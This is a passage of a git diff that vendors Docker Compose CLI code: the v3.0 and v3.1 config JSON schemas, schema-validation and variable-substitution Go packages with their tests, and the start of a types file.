+	err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
+	if err != nil {
+		return err
+	}
+	err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
+	if err != nil {
+		return err
+	}
+	err = os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
+	if err != nil {
+		return err
+	}
+	return nil
+}
+
+// RestoreAssets restores an asset under the given directory recursively
+func RestoreAssets(dir, name string) error {
+	children, err := AssetDir(name)
+	// File
+	if err != nil {
+		return RestoreAsset(dir, name)
+	}
+	// Dir
+	for _, child := range children {
+		err = RestoreAssets(dir, filepath.Join(name, child))
+		if err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+func _filePath(dir, name string) string {
+	cannonicalName := strings.Replace(name, "\\", "/", -1)
+	return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
+}
+
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
new file mode 100644
index 0000000000..fbcd8bb859
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.0.json
@@ -0,0 +1,383 @@
+{
+  "$schema": "http://json-schema.org/draft-04/schema#",
+  "id": "config_schema_v3.0.json",
+  "type": "object",
+  "required": ["version"],
+
+  "properties": {
+    "version": {
+      "type": "string"
+    },
+
+    "services": {
+      "id": "#/properties/services",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/service"
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "networks": {
+      "id": "#/properties/networks",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/network"
+        }
+      }
+    },
+
+    "volumes": {
+      "id": "#/properties/volumes",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/volume"
+        }
+      },
+      "additionalProperties": false
+    }
+  },
+
+  "additionalProperties": false,
+
+  "definitions": {
+
+    "service": {
+      "id": "#/definitions/service",
+      "type": "object",
+
+      "properties": {
+        "deploy": {"$ref": "#/definitions/deployment"},
+        "build": {
+          "oneOf": [
+            {"type": "string"},
+            {
+              "type": "object",
+              "properties": {
+                "context": {"type": "string"},
+                "dockerfile": {"type": "string"},
+                "args": {"$ref": "#/definitions/list_or_dict"}
+              },
+              "additionalProperties": false
+            }
+          ]
+        },
+        "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "cgroup_parent": {"type": "string"},
+        "command": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "container_name": {"type": "string"},
+        "depends_on": {"$ref": "#/definitions/list_of_strings"},
+        "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "dns": {"$ref": "#/definitions/string_or_list"},
+        "dns_search": {"$ref": "#/definitions/string_or_list"},
+        "domainname": {"type": "string"},
+        "entrypoint": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "env_file": {"$ref": "#/definitions/string_or_list"},
+        "environment": {"$ref": "#/definitions/list_or_dict"},
+
+        "expose": {
+          "type": "array",
+          "items": {
+            "type": ["string", "number"],
+            "format": "expose"
+          },
+          "uniqueItems": true
+        },
+
+        "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "extra_hosts": {"$ref": "#/definitions/list_or_dict"},
+        "healthcheck": {"$ref": "#/definitions/healthcheck"},
+        "hostname": {"type": "string"},
+        "image": {"type": "string"},
+        "ipc": {"type": "string"},
+        "labels": {"$ref": "#/definitions/list_or_dict"},
+        "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+
+        "logging": {
+            "type": "object",
+
+            "properties": {
+                "driver": {"type": "string"},
+                "options": {
+                  "type": "object",
+                  "patternProperties": {
+                    "^.+$": {"type": ["string", "number", "null"]}
+                  }
+                }
+            },
+            "additionalProperties": false
+        },
+
+        "mac_address": {"type": "string"},
+        "network_mode": {"type": "string"},
+
+        "networks": {
+          "oneOf": [
+            {"$ref": "#/definitions/list_of_strings"},
+            {
+              "type": "object",
+              "patternProperties": {
+                "^[a-zA-Z0-9._-]+$": {
+                  "oneOf": [
+                    {
+                      "type": "object",
+                      "properties": {
+                        "aliases": {"$ref": "#/definitions/list_of_strings"},
+                        "ipv4_address": {"type": "string"},
+                        "ipv6_address": {"type": "string"}
+                      },
+                      "additionalProperties": false
+                    },
+                    {"type": "null"}
+                  ]
+                }
+              },
+              "additionalProperties": false
+            }
+          ]
+        },
+        "pid": {"type": ["string", "null"]},
+
+        "ports": {
+          "type": "array",
+          "items": {
+            "type": ["string", "number"],
+            "format": "ports"
+          },
+          "uniqueItems": true
+        },
+
+        "privileged": {"type": "boolean"},
+        "read_only": {"type": "boolean"},
+        "restart": {"type": "string"},
+        "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "shm_size": {"type": ["number", "string"]},
+        "sysctls": {"$ref": "#/definitions/list_or_dict"},
+        "stdin_open": {"type": "boolean"},
+        "stop_grace_period": {"type": "string", "format": "duration"},
+        "stop_signal": {"type": "string"},
+        "tmpfs": {"$ref": "#/definitions/string_or_list"},
+        "tty": {"type": "boolean"},
+        "ulimits": {
+          "type": "object",
+          "patternProperties": {
+            "^[a-z]+$": {
+              "oneOf": [
+                {"type": "integer"},
+                {
+                  "type":"object",
+                  "properties": {
+                    "hard": {"type": "integer"},
+                    "soft": {"type": "integer"}
+                  },
+                  "required": ["soft", "hard"],
+                  "additionalProperties": false
+                }
+              ]
+            }
+          }
+        },
+        "user": {"type": "string"},
+        "userns_mode": {"type": "string"},
+        "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "working_dir": {"type": "string"}
+      },
+      "additionalProperties": false
+    },
+
+    "healthcheck": {
+      "id": "#/definitions/healthcheck",
+      "type": "object",
+      "additionalProperties": false,
+      "properties": {
+        "disable": {"type": "boolean"},
+        "interval": {"type": "string"},
+        "retries": {"type": "number"},
+        "test": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "timeout": {"type": "string"}
+      }
+    },
+    "deployment": {
+      "id": "#/definitions/deployment",
+      "type": ["object", "null"],
+      "properties": {
+        "mode": {"type": "string"},
+        "replicas": {"type": "integer"},
+        "labels": {"$ref": "#/definitions/list_or_dict"},
+        "update_config": {
+          "type": "object",
+          "properties": {
+            "parallelism": {"type": "integer"},
+            "delay": {"type": "string", "format": "duration"},
+            "failure_action": {"type": "string"},
+            "monitor": {"type": "string", "format": "duration"},
+            "max_failure_ratio": {"type": "number"}
+          },
+          "additionalProperties": false
+        },
+        "resources": {
+          "type": "object",
+          "properties": {
+            "limits": {"$ref": "#/definitions/resource"},
+            "reservations": {"$ref": "#/definitions/resource"}
+          }
+        },
+        "restart_policy": {
+          "type": "object",
+          "properties": {
+            "condition": {"type": "string"},
+            "delay": {"type": "string", "format": "duration"},
+            "max_attempts": {"type": "integer"},
+            "window": {"type": "string", "format": "duration"}
+          },
+          "additionalProperties": false
+        },
+        "placement": {
+          "type": "object",
+          "properties": {
+            "constraints": {"type": "array", "items": {"type": "string"}}
+          },
+          "additionalProperties": false
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "resource": {
+      "id": "#/definitions/resource",
+      "type": "object",
+      "properties": {
+        "cpus": {"type": "string"},
+        "memory": {"type": "string"}
+      },
+      "additionalProperties": false
+    },
+
+    "network": {
+      "id": "#/definitions/network",
+      "type": ["object", "null"],
+      "properties": {
+        "driver": {"type": "string"},
+        "driver_opts": {
+          "type": "object",
+          "patternProperties": {
+            "^.+$": {"type": ["string", "number"]}
+          }
+        },
+        "ipam": {
+          "type": "object",
+          "properties": {
+            "driver": {"type": "string"},
+            "config": {
+              "type": "array",
+              "items": {
+                "type": "object",
+                "properties": {
+                  "subnet": {"type": "string"}
+                },
+                "additionalProperties": false
+              }
+            }
+          },
+          "additionalProperties": false
+        },
+        "external": {
+          "type": ["boolean", "object"],
+          "properties": {
+            "name": {"type": "string"}
+          },
+          "additionalProperties": false
+        },
+        "internal": {"type": "boolean"},
+        "labels": {"$ref": "#/definitions/list_or_dict"}
+      },
+      "additionalProperties": false
+    },
+
+    "volume": {
+      "id": "#/definitions/volume",
+      "type": ["object", "null"],
+      "properties": {
+        "driver": {"type": "string"},
+        "driver_opts": {
+          "type": "object",
+          "patternProperties": {
+            "^.+$": {"type": ["string", "number"]}
+          }
+        },
+        "external": {
+          "type": ["boolean", "object"],
+          "properties": {
+            "name": {"type": "string"}
+          },
+          "additionalProperties": false
+        },
+        "labels": {"$ref": "#/definitions/list_or_dict"}
+      },
+      "additionalProperties": false
+    },
+
+    "string_or_list": {
+      "oneOf": [
+        {"type": "string"},
+        {"$ref": "#/definitions/list_of_strings"}
+      ]
+    },
+
+    "list_of_strings": {
+      "type": "array",
+      "items": {"type": "string"},
+      "uniqueItems": true
+    },
+
+    "list_or_dict": {
+      "oneOf": [
+        {
+          "type": "object",
+          "patternProperties": {
+            ".+": {
+              "type": ["string", "number", "null"]
+            }
+          },
+          "additionalProperties": false
+        },
+        {"type": "array", "items": {"type": "string"}, "uniqueItems": true}
+      ]
+    },
+
+    "constraints": {
+      "service": {
+        "id": "#/definitions/constraints/service",
+        "anyOf": [
+          {"required": ["build"]},
+          {"required": ["image"]}
+        ],
+        "properties": {
+          "build": {
+            "required": ["context"]
+          }
+        }
+      }
+    }
+  }
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
new file mode 100644
index 0000000000..b7037485f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/schema/data/config_schema_v3.1.json
@@ -0,0 +1,428 @@
+{
+  "$schema": "http://json-schema.org/draft-04/schema#",
+  "id": "config_schema_v3.1.json",
+  "type": "object",
+  "required": ["version"],
+
+  "properties": {
+    "version": {
+      "type": "string"
+    },
+
+    "services": {
+      "id": "#/properties/services",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/service"
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "networks": {
+      "id": "#/properties/networks",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/network"
+        }
+      }
+    },
+
+    "volumes": {
+      "id": "#/properties/volumes",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/volume"
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "secrets": {
+      "id": "#/properties/secrets",
+      "type": "object",
+      "patternProperties": {
+        "^[a-zA-Z0-9._-]+$": {
+          "$ref": "#/definitions/secret"
+        }
+      },
+      "additionalProperties": false
+    }
+  },
+
+  "additionalProperties": false,
+
+  "definitions": {
+
+    "service": {
+      "id": "#/definitions/service",
+      "type": "object",
+
+      "properties": {
+        "deploy": {"$ref": "#/definitions/deployment"},
+        "build": {
+          "oneOf": [
+            {"type": "string"},
+            {
+              "type": "object",
+              "properties": {
+                "context": {"type": "string"},
+                "dockerfile": {"type": "string"},
+                "args": {"$ref": "#/definitions/list_or_dict"}
+              },
+              "additionalProperties": false
+            }
+          ]
+        },
+        "cap_add": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "cap_drop": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "cgroup_parent": {"type": "string"},
+        "command": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "container_name": {"type": "string"},
+        "depends_on": {"$ref": "#/definitions/list_of_strings"},
+        "devices": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "dns": {"$ref": "#/definitions/string_or_list"},
+        "dns_search": {"$ref": "#/definitions/string_or_list"},
+        "domainname": {"type": "string"},
+        "entrypoint": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "env_file": {"$ref": "#/definitions/string_or_list"},
+        "environment": {"$ref": "#/definitions/list_or_dict"},
+
+        "expose": {
+          "type": "array",
+          "items": {
+            "type": ["string", "number"],
+            "format": "expose"
+          },
+          "uniqueItems": true
+        },
+
+        "external_links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "extra_hosts": {"$ref": "#/definitions/list_or_dict"},
+        "healthcheck": {"$ref": "#/definitions/healthcheck"},
+        "hostname": {"type": "string"},
+        "image": {"type": "string"},
+        "ipc": {"type": "string"},
+        "labels": {"$ref": "#/definitions/list_or_dict"},
+        "links": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+
+        "logging": {
+            "type": "object",
+
+            "properties": {
+                "driver": {"type": "string"},
+                "options": {
+                  "type": "object",
+                  "patternProperties": {
+                    "^.+$": {"type": ["string", "number", "null"]}
+                  }
+                }
+            },
+            "additionalProperties": false
+        },
+
+        "mac_address": {"type": "string"},
+        "network_mode": {"type": "string"},
+
+        "networks": {
+          "oneOf": [
+            {"$ref": "#/definitions/list_of_strings"},
+            {
+              "type": "object",
+              "patternProperties": {
+                "^[a-zA-Z0-9._-]+$": {
+                  "oneOf": [
+                    {
+                      "type": "object",
+                      "properties": {
+                        "aliases": {"$ref": "#/definitions/list_of_strings"},
+                        "ipv4_address": {"type": "string"},
+                        "ipv6_address": {"type": "string"}
+                      },
+                      "additionalProperties": false
+                    },
+                    {"type": "null"}
+                  ]
+                }
+              },
+              "additionalProperties": false
+            }
+          ]
+        },
+        "pid": {"type": ["string", "null"]},
+
+        "ports": {
+          "type": "array",
+          "items": {
+            "type": ["string", "number"],
+            "format": "ports"
+          },
+          "uniqueItems": true
+        },
+
+        "privileged": {"type": "boolean"},
+        "read_only": {"type": "boolean"},
+        "restart": {"type": "string"},
+        "security_opt": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "shm_size": {"type": ["number", "string"]},
+        "secrets": {
+          "type": "array",
+          "items": {
+            "oneOf": [
+              {"type": "string"},
+              {
+                "type": "object",
+                "properties": {
+                  "source": {"type": "string"},
+                  "target": {"type": "string"},
+                  "uid": {"type": "string"},
+                  "gid": {"type": "string"},
+                  "mode": {"type": "number"}
+                }
+              }
+            ]
+          }
+        },
+        "sysctls": {"$ref": "#/definitions/list_or_dict"},
+        "stdin_open": {"type": "boolean"},
+        "stop_grace_period": {"type": "string", "format": "duration"},
+        "stop_signal": {"type": "string"},
+        "tmpfs": {"$ref": "#/definitions/string_or_list"},
+        "tty": {"type": "boolean"},
+        "ulimits": {
+          "type": "object",
+          "patternProperties": {
+            "^[a-z]+$": {
+              "oneOf": [
+                {"type": "integer"},
+                {
+                  "type":"object",
+                  "properties": {
+                    "hard": {"type": "integer"},
+                    "soft": {"type": "integer"}
+                  },
+                  "required": ["soft", "hard"],
+                  "additionalProperties": false
+                }
+              ]
+            }
+          }
+        },
+        "user": {"type": "string"},
+        "userns_mode": {"type": "string"},
+        "volumes": {"type": "array", "items": {"type": "string"}, "uniqueItems": true},
+        "working_dir": {"type": "string"}
+      },
+      "additionalProperties": false
+    },
+
+    "healthcheck": {
+      "id": "#/definitions/healthcheck",
+      "type": "object",
+      "additionalProperties": false,
+      "properties": {
+        "disable": {"type": "boolean"},
+        "interval": {"type": "string"},
+        "retries": {"type": "number"},
+        "test": {
+          "oneOf": [
+            {"type": "string"},
+            {"type": "array", "items": {"type": "string"}}
+          ]
+        },
+        "timeout": {"type": "string"}
+      }
+    },
+    "deployment": {
+      "id": "#/definitions/deployment",
+      "type": ["object", "null"],
+      "properties": {
+        "mode": {"type": "string"},
+        "replicas": {"type": "integer"},
+        "labels": {"$ref": "#/definitions/list_or_dict"},
+        "update_config": {
+          "type": "object",
+          "properties": {
+            "parallelism": {"type": "integer"},
+            "delay": {"type": "string", "format": "duration"},
+            "failure_action": {"type": "string"},
+            "monitor": {"type": "string", "format": "duration"},
+            "max_failure_ratio": {"type": "number"}
+          },
+          "additionalProperties": false
+        },
+        "resources": {
+          "type": "object",
+          "properties": {
+            "limits": {"$ref": "#/definitions/resource"},
+            "reservations": {"$ref": "#/definitions/resource"}
+          }
+        },
+        "restart_policy": {
+          "type": "object",
+          "properties": {
+            "condition": {"type": "string"},
+            "delay": {"type": "string", "format": "duration"},
+            "max_attempts": {"type": "integer"},
+            "window": {"type": "string", "format": "duration"}
+          },
+          "additionalProperties": false
+        },
+        "placement": {
+          "type": "object",
+          "properties": {
+            "constraints": {"type": "array", "items": {"type": "string"}}
+          },
+          "additionalProperties": false
+        }
+      },
+      "additionalProperties": false
+    },
+
+    "resource": {
+      "id": "#/definitions/resource",
+      "type": "object",
+      "properties": {
+        "cpus": {"type": "string"},
+        "memory": {"type": "string"}
+      },
+      "additionalProperties": false
+    },
+
+    "network": {
+      "id": "#/definitions/network",
+      "type": ["object", "null"],
+      "properties": {
+        "driver": {"type": "string"},
+        "driver_opts": {
+          "type": "object",
+          "patternProperties": {
+            "^.+$": {"type": ["string", "number"]}
+          }
+        },
+        "ipam": {
+          "type": "object",
+          "properties": {
+            "driver": {"type": "string"},
+            "config": {
+              "type": "array",
+              "items": {
+                "type": "object",
+                "properties": {
+                  "subnet": {"type": "string"}
+                },
+                "additionalProperties": false
+              }
+            }
+          },
+          "additionalProperties": false
+        },
+        "external": {
+          "type": ["boolean", "object"],
+          "properties": {
+            "name": {"type": "string"}
+          },
+          "additionalProperties": false
+        },
+        "internal": {"type": "boolean"},
+        "labels": {"$ref": "#/definitions/list_or_dict"}
+      },
+      "additionalProperties": false
+    },
+
+    "volume": {
+      "id": "#/definitions/volume",
+      "type": ["object", "null"],
+      "properties": {
+        "driver": {"type": "string"},
+        "driver_opts": {
+          "type": "object",
+          "patternProperties": {
+            "^.+$": {"type": ["string", "number"]}
+          }
+        },
+        "external": {
+          "type": ["boolean", "object"],
+          "properties": {
+            "name": {"type": "string"}
+          },
+          "additionalProperties": false
+        },
+        "labels": {"$ref": "#/definitions/list_or_dict"}
+      },
+      "additionalProperties": false
+    },
+
+    "secret": {
+      "id": "#/definitions/secret",
+      "type": "object",
+      "properties": {
+        "file": {"type": "string"},
+        "external": {
+          "type": ["boolean", "object"],
+          "properties": {
+            "name": {"type": "string"}
+          }
+        },
+        "labels": {"$ref": "#/definitions/list_or_dict"}
+      },
+      "additionalProperties": false
+    },
+
+    "string_or_list": {
+      "oneOf": [
+        {"type": "string"},
+        {"$ref": "#/definitions/list_of_strings"}
+      ]
+    },
+
+    "list_of_strings": {
+      "type": "array",
+      "items": {"type": "string"},
+      "uniqueItems": true
+    },
+
+    "list_or_dict": {
+      "oneOf": [
+        {
+          "type": "object",
+          "patternProperties": {
+            ".+": {
+              "type": ["string", "number", "null"]
+            }
+          },
+          "additionalProperties": false
+        },
+        {"type": "array", "items": {"type": "string"}, "uniqueItems": true}
+      ]
+    },
+
+    "constraints": {
+      "service": {
+        "id": "#/definitions/constraints/service",
+        "anyOf": [
+          {"required": ["build"]},
+          {"required": ["image"]}
+        ],
+        "properties": {
+          "build": {
+            "required": ["context"]
+          }
+        }
+      }
+    }
+  }
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema.go b/vendor/github.com/docker/docker/cli/compose/schema/schema.go
new file mode 100644
index 0000000000..ae33c77fbe
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/schema/schema.go
@@ -0,0 +1,137 @@
+package schema
+
+//go:generate go-bindata -pkg schema -nometadata data
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"github.com/pkg/errors"
+	"github.com/xeipuuv/gojsonschema"
+)
+
+const (
+	defaultVersion = "1.0"
+	versionField   = "version"
+)
+
+type portsFormatChecker struct{}
+
+func (checker portsFormatChecker) IsFormat(input string) bool {
+	// TODO: implement this
+	return true
+}
+
+type durationFormatChecker struct{}
+
+func (checker durationFormatChecker) IsFormat(input string) bool {
+	_, err := time.ParseDuration(input)
+	return err == nil
+}
+
+func init() {
+	gojsonschema.FormatCheckers.Add("expose", portsFormatChecker{})
+	gojsonschema.FormatCheckers.Add("ports", portsFormatChecker{})
+	gojsonschema.FormatCheckers.Add("duration", durationFormatChecker{})
+}
+
+// Version returns the version of the config, defaulting to version 1.0
+func Version(config map[string]interface{}) string {
+	version, ok := config[versionField]
+	if !ok {
+		return defaultVersion
+	}
+	return normalizeVersion(fmt.Sprintf("%v", version))
+}
+
+func normalizeVersion(version string) string {
+	switch version {
+	case "3":
+		return "3.0"
+	default:
+		return version
+	}
+}
+
+// Validate uses the jsonschema to validate the configuration
+func Validate(config map[string]interface{}, version string) error {
+	schemaData, err := Asset(fmt.Sprintf("data/config_schema_v%s.json", version))
+	if err != nil {
+		return errors.Errorf("unsupported Compose file version: %s", version)
+	}
+
+	schemaLoader := gojsonschema.NewStringLoader(string(schemaData))
+	dataLoader := gojsonschema.NewGoLoader(config)
+
+	result, err := gojsonschema.Validate(schemaLoader, dataLoader)
+	if err != nil {
+		return err
+	}
+
+	if !result.Valid() {
+		return toError(result)
+	}
+
+	return nil
+}
+
+func toError(result *gojsonschema.Result) error {
+	err := getMostSpecificError(result.Errors())
+	description := getDescription(err)
+	return fmt.Errorf("%s %s", err.Field(), description)
+}
+
+func getDescription(err gojsonschema.ResultError) string {
+	if err.Type() == "invalid_type" {
+		if expectedType, ok := err.Details()["expected"].(string); ok {
+			return fmt.Sprintf("must be a %s", humanReadableType(expectedType))
+		}
+	}
+
+	return err.Description()
+}
+
+func humanReadableType(definition string) string {
+	if definition[0:1] == "[" {
+		allTypes := strings.Split(definition[1:len(definition)-1], ",")
+		for i, t := range allTypes {
+			allTypes[i] = humanReadableType(t)
+		}
+		return fmt.Sprintf(
+			"%s or %s",
+			strings.Join(allTypes[0:len(allTypes)-1], ", "),
+			allTypes[len(allTypes)-1],
+		)
+	}
+	if definition == "object" {
+		return "mapping"
+	}
+	if definition == "array" {
+		return "list"
+	}
+	return definition
+}
+
+func getMostSpecificError(errors []gojsonschema.ResultError) gojsonschema.ResultError {
+	var mostSpecificError gojsonschema.ResultError
+
+	for _, err := range errors {
+		if mostSpecificError == nil {
+			mostSpecificError = err
+		} else if specificity(err) > specificity(mostSpecificError) {
+			mostSpecificError = err
+		} else if specificity(err) == specificity(mostSpecificError) {
+			// Invalid type errors win in a tie-breaker for most specific field name
+			if err.Type() == "invalid_type" && mostSpecificError.Type() != "invalid_type" {
+				mostSpecificError = err
+			}
+		}
+	}
+
+	return mostSpecificError
+}
+
+func specificity(err gojsonschema.ResultError) int {
+	return len(strings.Split(err.Field(), "."))
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
new file mode 100644
index 0000000000..0935d4022e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/schema/schema_test.go
@@ -0,0 +1,52 @@
+package schema
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+type dict map[string]interface{}
+
+func TestValidate(t *testing.T) {
+	config := dict{
+		"version": "3.0",
+		"services": dict{
+			"foo": dict{
+				"image": "busybox",
+			},
+		},
+	}
+
+	assert.NoError(t, Validate(config, "3.0"))
+}
+
+func TestValidateUndefinedTopLevelOption(t *testing.T) {
+	config := dict{
+		"version": "3.0",
+		"helicopters": dict{
+			"foo": dict{
+				"image": "busybox",
+			},
+		},
+	}
+
+	err := Validate(config, "3.0")
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "Additional property helicopters is not allowed")
+}
+
+func TestValidateInvalidVersion(t *testing.T) {
+	config := dict{
+		"version": "2.1",
+		"services": dict{
+			"foo": dict{
+				"image": "busybox",
+			},
+		},
+	}
+
+	err := Validate(config, "2.1")
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "unsupported Compose file version: 2.1")
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/template/template.go b/vendor/github.com/docker/docker/cli/compose/template/template.go
new file mode 100644
index 0000000000..28495baf50
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/template/template.go
@@ -0,0 +1,100 @@
+package template
+
+import (
+	"fmt"
+	"regexp"
+	"strings"
+)
+
+var delimiter = "\\$"
+var substitution = "[_a-z][_a-z0-9]*(?::?-[^}]+)?"
+
+var patternString = fmt.Sprintf(
+	"%s(?i:(?P<escaped>%s)|(?P<named>%s)|{(?P<braced>%s)}|(?P<invalid>))",
+	delimiter, delimiter, substitution, substitution,
+)
+
+var pattern = regexp.MustCompile(patternString)
+
+// InvalidTemplateError is returned when a variable template is not in a valid
+// format
+type InvalidTemplateError struct {
+	Template string
+}
+
+func (e InvalidTemplateError) Error() string {
+	return fmt.Sprintf("Invalid template: %#v", e.Template)
+}
+
+// Mapping is a user-supplied function which maps from variable names to values.
+// Returns the value as a string and a bool indicating whether
+// the value is present, to distinguish between an empty string
+// and the absence of a value.
+type Mapping func(string) (string, bool)
+
+// Substitute variables in the string with their values
+func Substitute(template string, mapping Mapping) (result string, err *InvalidTemplateError) {
+	result = pattern.ReplaceAllStringFunc(template, func(substring string) string {
+		matches := pattern.FindStringSubmatch(substring)
+		groups := make(map[string]string)
+		for i, name := range pattern.SubexpNames() {
+			if i != 0 {
+				groups[name] = matches[i]
+			}
+		}
+
+		substitution := groups["named"]
+		if substitution == "" {
+			substitution = groups["braced"]
+		}
+		if substitution != "" {
+			// Soft default (fall back if unset or empty)
+			if strings.Contains(substitution, ":-") {
+				name, defaultValue := partition(substitution, ":-")
+				value, ok := mapping(name)
+				if !ok || value == "" {
+					return defaultValue
+				}
+				return value
+			}
+
+			// Hard default (fall back if-and-only-if empty)
+			if strings.Contains(substitution, "-") {
+				name, defaultValue := partition(substitution, "-")
+				value, ok := mapping(name)
+				if !ok {
+					return defaultValue
+				}
+				return value
+			}
+
+			// No default (fall back to empty string)
+			value, ok := mapping(substitution)
+			if !ok {
+				return ""
+			}
+			return value
+		}
+
+		if escaped := groups["escaped"]; escaped != "" {
+			return escaped
+		}
+
+		err = &InvalidTemplateError{Template: template}
+		return ""
+	})
+
+	return result, err
+}
+
+// Split the string at the first occurrence of sep, and return the part before the separator,
+// and the part after the separator.
+//
+// If the separator is not found, return the string itself, followed by an empty string.
+func partition(s, sep string) (string, string) {
+	if strings.Contains(s, sep) {
+		parts := strings.SplitN(s, sep, 2)
+		return parts[0], parts[1]
+	}
+	return s, ""
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/template/template_test.go b/vendor/github.com/docker/docker/cli/compose/template/template_test.go
new file mode 100644
index 0000000000..6b81bf0a39
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/template/template_test.go
@@ -0,0 +1,83 @@
+package template
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/assert"
+)
+
+var defaults = map[string]string{
+	"FOO": "first",
+	"BAR": "",
+}
+
+func defaultMapping(name string) (string, bool) {
+	val, ok := defaults[name]
+	return val, ok
+}
+
+func TestEscaped(t *testing.T) {
+	result, err := Substitute("$${foo}", defaultMapping)
+	assert.NoError(t, err)
+	assert.Equal(t, "${foo}", result)
+}
+
+func TestInvalid(t *testing.T) {
+	invalidTemplates := []string{
+		"${",
+		"$}",
+		"${}",
+		"${ }",
+		"${ foo}",
+		"${foo }",
+		"${foo!}",
+	}
+
+	for _, template := range invalidTemplates {
+		_, err := Substitute(template, defaultMapping)
+		assert.Error(t, err)
+		assert.IsType(t, &InvalidTemplateError{}, err)
+	}
+}
+
+func TestNoValueNoDefault(t *testing.T) {
+	for _, template := range []string{"This ${missing} var", "This ${BAR} var"} {
+		result, err := Substitute(template, defaultMapping)
+		assert.NoError(t, err)
+		assert.Equal(t, "This  var", result)
+	}
+}
+
+func TestValueNoDefault(t *testing.T) {
+	for _, template := range []string{"This $FOO var", "This ${FOO} var"} {
+		result, err := Substitute(template, defaultMapping)
+		assert.NoError(t, err)
+		assert.Equal(t, "This first var", result)
+	}
+}
+
+func TestNoValueWithDefault(t *testing.T) {
+	for _, template := range []string{"ok ${missing:-def}", "ok ${missing-def}"} {
+		result, err := Substitute(template, defaultMapping)
+		assert.NoError(t, err)
+		assert.Equal(t, "ok def", result)
+	}
+}
+
+func TestEmptyValueWithSoftDefault(t *testing.T) {
+	result, err := Substitute("ok ${BAR:-def}", defaultMapping)
+	assert.NoError(t, err)
+	assert.Equal(t, "ok def", result)
+}
+
+func TestEmptyValueWithHardDefault(t *testing.T) {
+	result, err := Substitute("ok ${BAR-def}", defaultMapping)
+	assert.NoError(t, err)
+	assert.Equal(t, "ok ", result)
+}
+
+func TestNonAlphanumericDefault(t *testing.T) {
+	result, err := Substitute("ok ${BAR:-/non:-alphanumeric}", defaultMapping)
+	assert.NoError(t, err)
+	assert.Equal(t, "ok /non:-alphanumeric", result)
+}
diff --git a/vendor/github.com/docker/docker/cli/compose/types/types.go b/vendor/github.com/docker/docker/cli/compose/types/types.go
new file mode 100644
index 0000000000..cae7b4af26
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/compose/types/types.go
@@ -0,0 +1,253 @@
+package types
+
+import (
+	"time"
+)
+
+// UnsupportedProperties not yet supported by this implementation of the compose file
+var UnsupportedProperties = []string{
+	"build",
+	"cap_add",
+	"cap_drop",
+	"cgroup_parent",
+	"devices",
+	"dns",
+	"dns_search",
+	"domainname",
+	"external_links",
+	"ipc",
+	"links",
+	"mac_address",
+	"network_mode",
+	"privileged",
+	"read_only",
+	"restart",
+	"security_opt",
+	"shm_size",
+	"stop_signal",
+	"sysctls",
